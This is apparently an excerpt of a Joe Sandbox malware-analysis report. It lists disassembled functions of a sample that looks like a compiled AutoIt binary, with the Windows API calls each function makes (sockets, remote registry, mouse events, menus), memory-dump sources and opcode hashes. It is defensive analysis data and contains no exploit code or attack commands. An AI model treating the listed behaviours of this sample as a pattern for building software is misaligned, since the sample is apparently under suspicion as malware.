                                                • Instruction Fuzzy Hash: 4731BF35604258EFDB218F18DC85F6537E1FF8A710F1941A4F611CB2B2CB6AA840DB55
                                                Function 007E6289 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007E7EA0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007E7ECB
                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007E62DC
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E62EB
                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007E6324
                                                • connect.WSOCK32(00000000,?,00000010), ref: 007E632D
                                                • WSAGetLastError.WSOCK32 ref: 007E6337
                                                • closesocket.WSOCK32(00000000), ref: 007E6360
                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007E6379
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                • String ID:
                                                • API String ID: 910771015-0
                                                • Opcode ID: eec3923a2b1a0632ad3d81041e1375d9e8055b5e0b35f80e771ac90445a665bc
                                                • Instruction ID: 2114358c49c0546c35cd6d157eacdac26ae95e45c75e7e6a4f36f365c21f3400
                                                • Opcode Fuzzy Hash: eec3923a2b1a0632ad3d81041e1375d9e8055b5e0b35f80e771ac90445a665bc
                                                • Instruction Fuzzy Hash: 0631A731601118AFDF10AF65CC89BBE7BBDEF587A4F048069FA0597291DB78AC04CB61
                                                Function 007CF98F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                • API String ID: 1038674560-2734436370
                                                • Opcode ID: 35d1d005cd65958377a536512bb439770421afa2f333507da8fc41ae13093993
                                                • Instruction ID: 3ef6d98ee4bf7eafd615a42565acb947e2660f9de3783e02806a795a109b49b0
                                                • Opcode Fuzzy Hash: 35d1d005cd65958377a536512bb439770421afa2f333507da8fc41ae13093993
                                                • Instruction Fuzzy Hash: 6D213132108511B6DA35FA259C0AFBBB3D9EF56314F50803DF88AC6181EBADAD52C395
                                                Function 007F75FF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00771D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00771D73
                                                  • Part of subcall function 00771D35: GetStockObject.GDI32(00000011), ref: 00771D87
                                                  • Part of subcall function 00771D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00771D91
                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007F7664
                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007F7671
                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007F767C
                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007F768B
                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007F7697
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$CreateObjectStockWindow
                                                • String ID: Msctls_Progress32
                                                • API String ID: 1025951953-3636473452
                                                • Opcode ID: 0cc5b308071b9a94bdacc63b02c3c806cbdb48b89be917e6b21c2bfa90e14767
                                                • Instruction ID: 8d9eb9f7cee70431f0e104394b34ec6758de62a4b94748caaf33300d58a87f80
                                                • Opcode Fuzzy Hash: 0cc5b308071b9a94bdacc63b02c3c806cbdb48b89be917e6b21c2bfa90e14767
                                                • Instruction Fuzzy Hash: BB118EB211021DBEEF159E64CC85EF77F6DEF08798F014115BB08A2190CA76AC21DBA4
                                                Function 00799C66 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __init_pointers.LIBCMT ref: 00799C66
                                                  • Part of subcall function 00793307: EncodePointer.KERNEL32(00000000), ref: 0079330A
                                                  • Part of subcall function 00793307: __initp_misc_winsig.LIBCMT ref: 00793325
                                                  • Part of subcall function 00793307: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0079A020
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0079A034
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0079A047
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0079A05A
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0079A06D
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0079A080
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0079A093
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0079A0A6
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0079A0B9
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0079A0CC
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0079A0DF
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0079A0F2
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0079A105
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0079A118
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0079A12B
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0079A13E
                                                • __mtinitlocks.LIBCMT ref: 00799C6B
                                                • __mtterm.LIBCMT ref: 00799C74
                                                  • Part of subcall function 00799CDC: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00799C79,00797E4D,0082A0B8,00000014), ref: 00799DD6
                                                  • Part of subcall function 00799CDC: _free.LIBCMT ref: 00799DDD
                                                  • Part of subcall function 00799CDC: DeleteCriticalSection.KERNEL32(0082EC00,?,?,00799C79,00797E4D,0082A0B8,00000014), ref: 00799DFF
                                                • __calloc_crt.LIBCMT ref: 00799C99
                                                • __initptd.LIBCMT ref: 00799CBB
                                                • GetCurrentThreadId.KERNEL32 ref: 00799CC2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                • String ID:
                                                • API String ID: 3567560977-0
                                                • Opcode ID: 4ddffe4176015572f5a507f2108a6acce1a1a1bfb55b672bf01c2fffbee169c7
                                                • Instruction ID: 5e3f4a331324933446d3ecf3ab30f801a9c835a595bc0f2b482d8c8fbcd57c7f
                                                • Opcode Fuzzy Hash: 4ddffe4176015572f5a507f2108a6acce1a1a1bfb55b672bf01c2fffbee169c7
                                                • Instruction Fuzzy Hash: 01F0F032149B1299FE74773CBC0B64A2AC5EF02731F20061EFA64C81D2EF2DC4814274
                                                Function 00794109 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,007941D2,?), ref: 00794123
                                                • GetProcAddress.KERNEL32(00000000), ref: 0079412A
                                                • EncodePointer.KERNEL32(00000000), ref: 00794136
                                                • DecodePointer.KERNEL32(00000001,007941D2,?), ref: 00794153
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                • String ID: RoInitialize$combase.dll
                                                • API String ID: 3489934621-340411864
                                                • Opcode ID: 92d4be7555aebb4b55a74ef59992885861d4fc1f0fcc229d017ed70a3c75b890
                                                • Instruction ID: af37e94e89c96e69a321d0bab08b28c7e47c34b29f27111ee60a524d4917c6b8
                                                • Opcode Fuzzy Hash: 92d4be7555aebb4b55a74ef59992885861d4fc1f0fcc229d017ed70a3c75b890
                                                • Instruction Fuzzy Hash: F2E0EE70690348AAEF106B70EC4DB283AA4BB96B02F108824F811E61E0DBF98581DA08
                                                Function 007941DE Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007940F8), ref: 007941F8
                                                • GetProcAddress.KERNEL32(00000000), ref: 007941FF
                                                • EncodePointer.KERNEL32(00000000), ref: 0079420A
                                                • DecodePointer.KERNEL32(007940F8), ref: 00794225
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                • String ID: RoUninitialize$combase.dll
                                                • API String ID: 3489934621-2819208100
                                                • Opcode ID: f0acf60d6ef72d4bccec10332ed04ff748a4738558a7e25e25a9a31a90986c30
                                                • Instruction ID: 64dbe1be88dc589273c117cd727aa389ae95ed4453632db55182f5de9b907be4
                                                • Opcode Fuzzy Hash: f0acf60d6ef72d4bccec10332ed04ff748a4738558a7e25e25a9a31a90986c30
                                                • Instruction Fuzzy Hash: B8E0B670591304EBEB509B61EC0DF183BA4FF44742F108826F511E11A0CFBE4640EA18
                                                Function 007D6561 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memmove$__itow__swprintf
                                                • String ID:
                                                • API String ID: 3253778849-0
                                                • Opcode ID: d2a12bc66f749c31692a404fc01bba4f418ec87d707eb17e0e276557f727c1c8
                                                • Instruction ID: 9c32ed009238f5615b7dd88e9ac99ca34d3cb0e8b060f3dc7869593ae6906558
                                                • Opcode Fuzzy Hash: d2a12bc66f749c31692a404fc01bba4f418ec87d707eb17e0e276557f727c1c8
                                                • Instruction Fuzzy Hash: 2E61AD3050065ADBDF11EF20C88AEFE37B9AF44358F04851AF9595B292EB38E911CB90
                                                Function 007F026F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                  • Part of subcall function 007F0EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007EFE38,?,?), ref: 007F0EBC
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F0348
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007F0388
                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007F03AB
                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007F03D4
                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 007F0417
                                                • RegCloseKey.ADVAPI32(00000000), ref: 007F0424
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                • String ID:
                                                • API String ID: 4046560759-0
                                                • Opcode ID: de2ba8c93402bb7edb109463251ff8473002b23658966db0f3ffed02b2f0efe3
                                                • Instruction ID: 82b4f601e6e4f4790a0da8f4b1c6e7283b61d03d344210162c0af85736e32a87
                                                • Opcode Fuzzy Hash: de2ba8c93402bb7edb109463251ff8473002b23658966db0f3ffed02b2f0efe3
                                                • Instruction Fuzzy Hash: FB514C31108204DFCB14EF64C889E7ABBE9FF85354F04892DF645872A2DB79E905CB92
                                                Function 007F5802 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetMenu.USER32(?), ref: 007F5864
                                                • GetMenuItemCount.USER32(00000000), ref: 007F589B
                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007F58C3
                                                • GetMenuItemID.USER32(?,?), ref: 007F5932
                                                • GetSubMenu.USER32(?,?), ref: 007F5940
                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 007F5991
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Menu$Item$CountMessagePostString
                                                • String ID:
                                                • API String ID: 650687236-0
                                                • Opcode ID: 8f12b8425dd53379a48ef85e3baf22d9a9f5f55521fddc0ce5ae3e5b5ef437d4
                                                • Instruction ID: 43bcdf480eec958ca1de491fd762b29d429e456cb61cc6dbbb45802c2ee3a56d
                                                • Opcode Fuzzy Hash: 8f12b8425dd53379a48ef85e3baf22d9a9f5f55521fddc0ce5ae3e5b5ef437d4
                                                • Instruction Fuzzy Hash: 61518031A00619EFCF14DFA4C845ABEB7B5EF48360F108069EA45BB351CB78AE41CB94
                                                Function 007CF1FE Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                Download Yara Rule
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 007CF218
                                                • VariantClear.OLEAUT32(00000013), ref: 007CF28A
                                                • VariantClear.OLEAUT32(00000000), ref: 007CF2E5
                                                • _memmove.LIBCMT ref: 007CF30F
                                                • VariantClear.OLEAUT32(?), ref: 007CF35C
                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007CF38A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Variant$Clear$ChangeInitType_memmove
                                                • String ID:
                                                • API String ID: 1101466143-0
                                                • Opcode ID: 7f34659ac90dda32692e8439486ef2eb620e968e50e61eb02fbc0e70b10a603c
                                                • Instruction ID: 3b1b905cf4dd98f9d6550dc0747120d235d547ad8ab5d8cdbd2364900785f526
                                                • Opcode Fuzzy Hash: 7f34659ac90dda32692e8439486ef2eb620e968e50e61eb02fbc0e70b10a603c
                                                • Instruction Fuzzy Hash: 175138B5A00249AFCB14CF58C884EAAB7B9FF48314B15856DED59DB301D734EA11CBA0
                                                Function 007D2502 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 007D2550
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D259B
                                                • IsMenu.USER32(00000000), ref: 007D25BB
                                                • CreatePopupMenu.USER32 ref: 007D25EF
                                                • GetMenuItemCount.USER32(000000FF), ref: 007D264D
                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007D267E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                • String ID:
                                                • API String ID: 3311875123-0
                                                • Opcode ID: 6cc0e5a177b003a33ea1ffc525ac8228c4d55f480afc5801b75f85a7bbbda008
                                                • Instruction ID: 4d50315b0335686382c572fc469640859810411bca6747b5cec12ecea07f485d
                                                • Opcode Fuzzy Hash: 6cc0e5a177b003a33ea1ffc525ac8228c4d55f480afc5801b75f85a7bbbda008
                                                • Instruction Fuzzy Hash: 3751A070604309EBCF20DF68D988AADBBF4BF64314F14415AE85197792EB78D907CB51
                                                Function 00771765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623
                                                • BeginPaint.USER32(?,?,?,?,?,?), ref: 0077179A
                                                • GetWindowRect.USER32(?,?), ref: 007717FE
                                                • ScreenToClient.USER32(?,?), ref: 0077181B
                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0077182C
                                                • EndPaint.USER32(?,?), ref: 00771876
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                • String ID:
                                                • API String ID: 1827037458-0
                                                • Opcode ID: 462944c322c902f426bcd8f7a1ace6b53ff2f28a4dc7b787a56af7c392d6be9a
                                                • Instruction ID: 042557247015552e180efb9cf2db622d60fab4593fd19b6ecdf909ca85b99e70
                                                • Opcode Fuzzy Hash: 462944c322c902f426bcd8f7a1ace6b53ff2f28a4dc7b787a56af7c392d6be9a
                                                • Instruction Fuzzy Hash: E9416071104600DFDB10DF29CC88B777BE8FB45764F148669F6A8C62A2CB389845DB62
                                                Function 007FB6D2 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ShowWindow.USER32(008357B0,00000000,01204888,?,?,008357B0,?,007FB5DC,?,?), ref: 007FB746
                                                • EnableWindow.USER32(?,00000000), ref: 007FB76A
                                                • ShowWindow.USER32(008357B0,00000000,01204888,?,?,008357B0,?,007FB5DC,?,?), ref: 007FB7CA
                                                • ShowWindow.USER32(?,00000004,?,007FB5DC,?,?), ref: 007FB7DC
                                                • EnableWindow.USER32(?,00000001), ref: 007FB800
                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 007FB823
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$Show$Enable$MessageSend
                                                • String ID:
                                                • API String ID: 642888154-0
                                                • Opcode ID: 02fc7cfd79df5b6994acbbec799fcaf2a21d8b7fac3f280019fa349281e659db
                                                • Instruction ID: 0284d33bd80482cb18ec2f7aaad2e99f99ed52270f0531a3a114554e61134d00
                                                • Opcode Fuzzy Hash: 02fc7cfd79df5b6994acbbec799fcaf2a21d8b7fac3f280019fa349281e659db
                                                • Instruction Fuzzy Hash: 73412434600148EFDB25DF24C889BA47BE5FF45355F1841BAEA498F362C735A845CBA1
                                                Function 007E71B3 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,007E4F57,?,?,00000000,00000001), ref: 007E71C1
                                                  • Part of subcall function 007E3AB6: GetWindowRect.USER32(?,?), ref: 007E3AC9
                                                • GetDesktopWindow.USER32 ref: 007E71EB
                                                • GetWindowRect.USER32(00000000), ref: 007E71F2
                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 007E7224
                                                  • Part of subcall function 007D52EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5363
                                                • GetCursorPos.USER32(?), ref: 007E7250
                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007E72AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                • String ID:
                                                • API String ID: 4137160315-0
                                                • Opcode ID: babb3b1e52e9f9fbadb2a49e40adf40ba2f0107d3dc1901d6ee9bb725a3e62c6
                                                • Instruction ID: 6fd634b00fd113fe7d53e7783abe54008eb53c0f63a9df0eddd3f25e1eb2a17c
